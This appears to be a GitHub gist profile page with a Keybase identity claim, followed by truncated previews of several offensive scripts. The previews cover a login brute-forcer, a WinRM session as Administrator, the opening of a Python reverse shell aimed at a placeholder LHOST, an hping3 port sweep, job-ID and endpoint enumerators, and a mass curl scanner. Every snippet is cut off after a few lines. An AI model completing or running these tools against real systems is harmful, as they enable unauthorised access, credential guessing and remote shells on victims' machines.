I hereby claim:
- I am echel0nn on github.
- I am echel0n (https://keybase.io/echel0n) on keybase.
- I have a public key whose fingerprint is 6C6D 3048 279E 8BED 359D AD07 2366 DC9F BF9F ED32
To claim this, I am signing this object:
| #!/usr/bin/env python | |
| import requests | |
| import sys | |
| def bruteforce(USERNAME, PASSWORD, URL): | |
| ERROR_STRING = "Login failed" | |
| # username=&password=&Login=Login&user_token= | |
| COOKIES, USER_TOKEN = setSessionCookie(URL) | |
| post_data = {'username': USERNAME, 'password': PASSWORD, 'Login': 'Login', |
| #!/usr/bin/env ruby | |
| require 'winrm' | |
| # Author: Alamot | |
| conn = WinRM::Connection.new( | |
| endpoint: 'http:/<REPLACE_ME>:5985/wsman', | |
| transport: :ssl, | |
| user: 'Administrator', |
| import pty | |
| from os import dup2, putenv | |
| import socket | |
| LHOST="HOSTIP" | |
| LPORT="1881" | |
| def FUOVERIT(): | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
| #!/usr/bin/env python | |
| # -*- coding: utf-8 -*- | |
| ## lazy | |
| import os | |
| f = open("IPS.txt","r") | |
| ADDPORT= ":8080" |
| #!/bin/bash | |
| for (( r = 12; r <= 12; ));do | |
| for (( i = 0; i < 10000; i++ )); do | |
| echo -n "IP:"| echo -n 172.16.90.$r && echo | |
| echo -n "Testing Port -> " && echo $i | |
| hping3 -S -c 2 -p $i 176.16.90.$r 2>/dev/null | grep -i "rtt" | |
| done | |
| done | |
| ## lazy |
| import requests | |
| URL = "http://<REPLACEME>/reports/rwservlet/getjobid<REPLACEME>" | |
| DEF_ERR_STR = "does not exist." | |
| def find(): | |
| ID = 0 | |
| while True: |
| import requests | |
| import sys | |
| import string | |
| import random | |
| URL = "http://<REPLACE_ME>/SendAccess?IpAddress={IPADDRESS}&MacAddress={MACADDRESS}&RelayTime={RELAYTIME}&MessageLine1={MESSAGELINE1}&MessageLine2={MESSAGELINE2}&MessageLine3={MESSAGELINE3}&MessageLine4={MESSAGELINE4}" | |
| DEF_ERR_STR = "System.InvalidOperationException: The operation is not allowed on non-connected sockets" | |
| import subprocess | |
| def scanMe(): | |
| f = open("HTTPs","r") | |
| IPS = f.read().split("\n") | |
| for ip in IPS: | |
| OUTPT = subprocess.run("curl 'http://" + str(ip) + "'", shell=True, capture_output=True) | |
| output_real = OUTPT.stdout.__repr__() | |
| if "awe" in output_real: |
| #!/usr/bin/env python | |
| # -*- coding: utf-8 -*- | |
| """ | |
| * *** | |
| ** *** | |
| ** ** | |
| ** ** | |
| ** ** **** | |
| *** **** ** *** *** ** * *** * *** **** |
I hereby claim:
To claim this, I am signing this object: